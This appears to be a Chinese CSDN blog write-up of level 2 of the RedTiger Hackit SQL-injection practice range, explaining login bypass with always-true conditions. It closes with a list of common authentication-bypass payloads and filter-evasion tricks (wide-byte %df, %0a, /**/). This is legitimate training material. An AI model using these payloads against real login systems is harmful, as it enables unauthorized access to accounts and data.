Redtiger.labs靶场闯关---第二关

已于 2024-09-13 10:13:04 修改
阅读量294 收藏 1
点赞数 5
文章标签: 数据库
于 2024-09-13 03:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52967270/article/details/142186428
版权

第二关链接:https://redtiger.labshttps://redtiger.labs.overthewire.org/level2.php?

第二关仍然为SQL注入关口,但是我们观察页面发现,只有账号和密码以及登录按钮,没有任何提示,也无法直接获取账号和密码直接登录,想要登录的话,只有绕过服务端的验证,直接诶访问数据库,由此可以判断为SQL注入中的万能密码登录。

 1. SQL注入万能密码的原理

        通过构造SQL语句绕过服务端的校验,直接访问数据库,以实现对 目标数据库的操作。

我们可以推断此处的SQL语句模型为:

Select  * FROM User where  username="输入的用户名"  And  password=“输入的密码”;

如果我们可以构造SQL语句,是用户名和Miami被匹配,那么我们就可以绕过验证,完成登录。

2.burp 抓包,构造闭合和注释

2.1 最笨的办法,单引号,注释符,挨个参数构造闭合

2.2 判断是账号登录处还是密码输入处存在万能密码注入

分别在账号和密码登录处构造万能密码

成功获取密码,点击 Hack it 到达第三关

分享一个账号输入处万能密码登录

总结:

        SQL注入万能密码,利用单引号、双引号、括号等构造闭合,构造注释,可能会存在符号被过滤的情况,可以使用 %0a,/**/ 替换空格,%27替换单引号等方式,绕过过滤。

        admin %df' or 1=1        %df破解单引号被过滤

常用的万能密码:

1.ASP万能密码

"or "a"="a

')or('a'='a

or 1=1--

'or 1=1--

a ' or' 1=1--

"or 1=1 --

'or'a'='a

"or"="a'='a

'or"='

'or'='or'

1 or '1'='1'=1

'OR 1=1%00

"or 1=1%00

'xor

admin' or 'a'='a 密码随便输入

2.PHP密码

'or 1=1/*

User:something Pass: 'or '1'='1

3.JSP 万能密码

1'or'1'='1

admin' or 1=1/*

Tuzi11---bfwy
关注
Redtiger解题技巧(一)
Lorezon的博客
10-12 1895
(写这个博客本意就是为了自我总结,然后顺便试试新买的键盘。博主本人其实也就是个菜鸟,所以希望前辈们多多指导) 第一: 根据提示,username=Hornoxe,给了Tablename: level1_users ok。我们先查看源码(看源码是我个人习惯,因为常常能在源码里发现意想不到的东西) 会发现一个有意思的东西:?cat=1 ok。返回答题,构造语句 http://redtiger.la...
SQL注入靶场 RedTiger教程(level1~level10)
0xuu的博客
07-07 1205
SQL注入靶场RedTiger's Hackit 通教程;RedTiger教程(level1~level10)
RedTiger's Hackit Level 2
GTMer的专栏
10-27 765
username处注入 a' or 'a' = 'a' -- d    不行,应该是把后面frome table给注释掉的原因。 由于and的优先级高于or,因此在username后注入的or语句和password判断and在一起,不管用。 在password后注入or语句,get !
RedTiger's Hackit(level2)
xz913400155的博客
12-11 508
第二 简单的sql绕过 https://redtiger.labs.overthewire.org/ 进入第二 给的目标是登入 提示是条件 然后就给了用户名及密码两个输入框 很容易就联想到输入内容就是查询语句中where的判断条件 账号密码一般都是用字符串格式 所以猜测where语句差不多是如下格式 where username=‘我们的输入’ and password=‘我们的输入’ 然...
靶场笔记之sql注入石器篇1
快乐时光
04-22 559
前言 偶然发现了https://redtiger.labs.overthewire.org/网站,上面有于sql注入的练习,分level1到level10,可依次进行练习。 本篇先介绍level1至level5的题目,可动手操作起来。 level 1 点击level 1进入https://redtiger.labs.overthewire.org/level1.php页,尝试了username和passwd没有发现任何问题,后来发现网站上有个Category:1的可...
SQL注入大闯关笔记
Sean的博客
03-17 2785
目录前言一、SQL注入是什么?二、靶场是什么?三、挖掘漏洞1.redtiger靶场1.第一2.第二3.第三总结 前言 随着国家对安全越来越重视,个人感觉每个人都需要了解一下安全方面的知识。学习安全,先要从靶场做起,说干就干。 一、SQL注入是什么? 所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,或作为存储过程的输入参数,这类表单特别容易受到SQL注入式攻
CTF入门指南(0基础)
Dasdwer的博客
08-09 842
ctf入门指南(capture the flag 夺旗比赛)
ctf
tcrefreshingbreeze的博客
10-07 2750
如何入门?如何组队?     capture the flag 夺旗比赛     类型:   Web 密码学 pwn 程序的逻辑分析,漏洞利用windows、linux、小型机等 misc 杂项,隐写,数据还原,脑洞、社会工程、与信息安全相的大数据 reverse 逆向windows、linux类 ppc 编程类的     国内外著名比赛   国外: 国内:...
如何学习网络安全?(网络安全学习笔记) (1)
shanguicsdn111的博客
08-19 1023
概括来说,网络安全课程的主要内容包括:安全基本知识应用加密学协议层安全Windows安全(攻击与防御)Unix/Linux安全(攻击与防御)防火墙技术审计和日志分析下面分别对每部分知识介绍相应的具体内容和一些参考书。一、安全基本知识这部分的学习过程相对容易些,可以花相对较少的时间来完成。这部分的内容包括:安全的概念和定义、常见的安全标准等。大部分于网络安全基础的书籍都会有这部分内容的介绍。
RedTiger‘s Hackit
Alita_lxz的博客
11-02 1479
RedTiger’s Hackit http://redtiger.labs.overthewire.org/ Level 1 Simple SQL-Injection 打开对应连接,是一个登录页面,先是告诉我们登录的用户名是什么,然后给了一个提示,把表名level1_users给出来了,现在就是要找注入点在哪里了,看到Category:后的1可以点击 点击之后出来cat=1,这就很明显了 试了一大顿,发现这个1后竟然不需要闭合引号,根据order by 得出表有4列 本来想爆一下列名,可能是有参数被
SQL注入教程——(三)简单的注入尝试
热门推荐
hijack89的博客
07-26 1万+
本文将以简单的SQL注入实例来讲解SQL注入的基本思路与流程,当然本文实例只是注入的一种情况,初学者应重点理解思路,学会举一反三。GET与POST进行SQL注入攻击,大家还需要了解两种基本的 HTTP 请求方法:GET 和 POST。在客户机和服务器之间进行请求-响应时,两种最常被用到的方法是:GET 和 POST。 GET - 从指定的资源请求数据。 POST - 向指定的资源提交要被处理的数据
219-6-3Google浏览器书签备份
qq_43046057的博客
06-03 3582
WAF 创建时间 2019-03-11 12:45:27 最后修改 2019-04-03 14:02:50>> 书签名称 链接 添加时间 WEB漏洞测试(二)——HTML注入 & XSS攻击 - CSDN博客 http://www.secsky.cn/216.html 2018-05-15 10:45:24 ModSecurity介绍 - CSDN博客...
实用SQL小总结
UntifA的博客
09-29 1466
SQL记录
Ubuntu有redis的命令
最新发布
weixin_53717695的博客
10-06 184
Ubuntu有redis的命令
MySQL之复合查询与内外连接
zdlynj的博客
09-30 1280
前面我们讲解的mysql表的查询都是对一张表进行查询,即数据的查询都是在某一时刻对一个表进行操作的。而在实际开发中,我们往往还需要对多个表同时进行查询。我们这里使用的测试表,为雇员信息表(来自Oracle 9i的经典测试表):EMP员工表,DEPT部门表,SALGRADE工资等级表。
点评项目-2-完善注册登录业务
m0_75138009的博客
09-29 601
需要处理的业务:在网页发送 /user/code 路径下的 post 请求后,我们需要检验手机号后,向合法的手机号发送一个随机生成的电话号。
World of Warcraft [CLASSIC][80][Grandel] Call to Arms: Victory in Wintergrasp
qq 117791303
10-02 317
Wintergrasp 冬拥湖 120 VS 120
Redis事务
zhzjn的博客
09-30 393
Redis事务可以通过MULTI、EXEC、WATCH和DISCARD指令来实现。1. MULTI指令:表示事务的开始,之后的所有指令都会被逐一记录,但不会立即执行。2. EXEC指令:表示事务的执行,会按照记录的指令逐一执行。3. WATCH指令:可以监视一个或多个键的变化,如果在事务执行期间被其他客户端修改,事务会被回滚。4. DISCARD指令:表示事务的撤销,可以放弃之前记录的指令。
【RocketMQ】RocketMQ应用难点
记录一名在读研究生的学习笔记、感悟、开发产物
09-30 897
本文探讨了RocketMQ中消息重复消费的问题及其解决方案,尤其是在CLUSTERING模式下的扩容影响。文章分析了重复消费的原因,如广播模式、负载均衡模式下的多consumerGroup消费、消费者组内的动态变化及网络延迟等,并提出了利用唯一标识进行去重的方法。此外,还讨论了如何选择合适的存储机制以高效处理大量消息标识,如HashMap、MySQL、Redis以及推荐的布隆过滤器等方案。对于防止消息堆积与确保消息不丢失,也给出了相应的策略和技术措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值